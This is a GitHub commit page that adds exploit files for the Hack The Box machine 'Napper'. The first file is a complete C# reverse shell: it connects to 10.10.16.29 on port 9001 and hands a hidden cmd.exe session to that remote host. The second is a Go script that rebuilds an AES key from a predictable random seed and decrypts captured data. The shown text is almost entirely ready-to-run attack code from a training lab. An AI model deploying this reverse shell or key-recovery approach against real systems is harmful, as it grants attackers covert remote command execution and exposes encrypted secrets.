-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
a6501b8
commit c8041e2
Showing
8 changed files
with
172 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,72 @@ | ||
using System; | ||
using System.Text; | ||
using System.IO; | ||
using System.Diagnostics; | ||
using System.ComponentModel; | ||
using System.Linq; | ||
using System.Net; | ||
using System.Net.Sockets; | ||
|
||
namespace Paylaod | ||
{ | ||
public class Run | ||
{ | ||
static StreamWriter streamWriter; | ||
|
||
public Run() | ||
{ | ||
using(TcpClient client = new TcpClient("10.10.16.29", 9001)) | ||
{ | ||
using(Stream stream = client.GetStream()) | ||
{ | ||
using(StreamReader rdr = new StreamReader(stream)) | ||
{ | ||
streamWriter = new StreamWriter(stream); | ||
|
||
StringBuilder strInput = new StringBuilder(); | ||
|
||
Process p = new Process(); | ||
p.StartInfo.FileName = "cmd"; | ||
p.StartInfo.CreateNoWindow = true; | ||
p.StartInfo.UseShellExecute = false; | ||
p.StartInfo.RedirectStandardOutput = true; | ||
p.StartInfo.RedirectStandardInput = true; | ||
p.StartInfo.RedirectStandardError = true; | ||
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); | ||
p.Start(); | ||
p.BeginOutputReadLine(); | ||
|
||
while(true) | ||
{ | ||
strInput.Append(rdr.ReadLine()); | ||
//strInput.Append("\n"); | ||
p.StandardInput.WriteLine(strInput); | ||
strInput.Remove(0, strInput.Length); | ||
} | ||
} | ||
} | ||
} | ||
} | ||
|
||
public static void Main(string[] args) | ||
{ | ||
new Run(); | ||
} | ||
|
||
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) | ||
{ | ||
StringBuilder strOutput = new StringBuilder(); | ||
|
||
if (!String.IsNullOrEmpty(outLine.Data)) | ||
{ | ||
try | ||
{ | ||
strOutput.Append(outLine.Data); | ||
streamWriter.WriteLine(strOutput); | ||
streamWriter.Flush(); | ||
} | ||
catch (Exception err) { } | ||
} | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,100 @@ | ||
/* | ||
AES Decryption Tool for Napper Challenge | ||
Author: Lukas Johannes Möller | ||
Date: 24.02.2024 | ||
License: MIT License | ||
This Go script is designed to decrypt data encrypted with AES-128 in CFB mode. It is specifically tailored for use in the Hack The Box machine "Napper" challenge, providing a means to decrypt data using a seed-based key generation approach. The script accepts two crucial pieces of information via command-line arguments: a seed used for key generation and the base64-encoded encrypted data. | ||
The decryption process involves the following steps: | ||
1. Generating a 128-bit AES key from the provided seed. | ||
2. Decoding the base64-encoded encrypted data to retrieve the ciphertext. | ||
3. Using the AES key and Cipher Feedback (CFB) mode to decrypt the ciphertext and obtain the original plaintext. | ||
Prerequisites: | ||
- Go (Golang) environment set up on the machine where the script will be run. | ||
Usage: | ||
The script is executed from the command line, where the seed and encrypted data are passed as arguments: | ||
go run decrypt.go -seed=<seed> -data="<base64-encoded-data>" | ||
Example: | ||
go run decrypt.go -seed=46385390 -data="tbjZvSCUhZtSmOqEYO1TFmX-ibTWLnMJc6CQJHZ_aM6alBTptvEaiMEvjv_Jfx33T7spOEMKOXg=" | ||
This script serves as an educational tool for understanding AES decryption and should be used in accordance with ethical guidelines and applicable laws. | ||
*/ | ||
package main | ||
|
||
import ( | ||
"crypto/aes" | ||
"crypto/cipher" | ||
"encoding/base64" | ||
"flag" | ||
"fmt" | ||
"math/rand" | ||
) | ||
|
||
// genKey generates a 128-bit AES key from a given seed | ||
func genKey(seed int64) []byte { | ||
rand.Seed(seed) | ||
key := make([]byte, 16) // AES-128 | ||
for i := range key { | ||
key[i] = byte(rand.Intn(254) + 1) | ||
} | ||
return key | ||
} | ||
|
||
// decrypt decrypts the encrypted data using the generated key and returns the original text | ||
func decrypt(seed int64, encryptedBase64 string) (string, error) { | ||
// Generate the encryption key using the same seed | ||
key := genKey(seed) | ||
|
||
// Decode the base64-encoded data | ||
encryptedData, err := base64.URLEncoding.DecodeString(encryptedBase64) | ||
if err != nil { | ||
return "", fmt.Errorf("base64 decode: %w", err) | ||
} | ||
|
||
// The first 16 bytes should be the IV | ||
iv := encryptedData[:aes.BlockSize] | ||
encryptedText := encryptedData[aes.BlockSize:] | ||
|
||
// Create a new AES cipher using the generated key | ||
block, err := aes.NewCipher(key) | ||
if err != nil { | ||
return "", fmt.Errorf("new cipher: %w", err) | ||
} | ||
|
||
// Decrypt the data using CFB mode | ||
stream := cipher.NewCFBDecrypter(block, iv) | ||
decrypted := make([]byte, len(encryptedText)) | ||
stream.XORKeyStream(decrypted, encryptedText) | ||
|
||
return string(decrypted), nil | ||
} | ||
|
||
func main() { | ||
// Define command-line flags | ||
seedPtr := flag.Int64("seed", 0, "Seed used to generate the encryption key") | ||
encryptedBase64Ptr := flag.String("data", "", "Base64-encoded encrypted data to decrypt") | ||
|
||
// Parse the flags | ||
flag.Parse() | ||
|
||
// Validate inputs | ||
if *seedPtr == 0 || *encryptedBase64Ptr == "" { | ||
fmt.Println("Usage: decrypt -seed=<seed> -data=\"<encrypted data>\"") | ||
return | ||
} | ||
|
||
// Decrypt the text using provided command-line arguments | ||
decryptedText, err := decrypt(*seedPtr, *encryptedBase64Ptr) | ||
if err != nil { | ||
fmt.Println("Decryption error:", err) | ||
return | ||
} | ||
|
||
fmt.Println("Decrypted text:", decryptedText) | ||
} |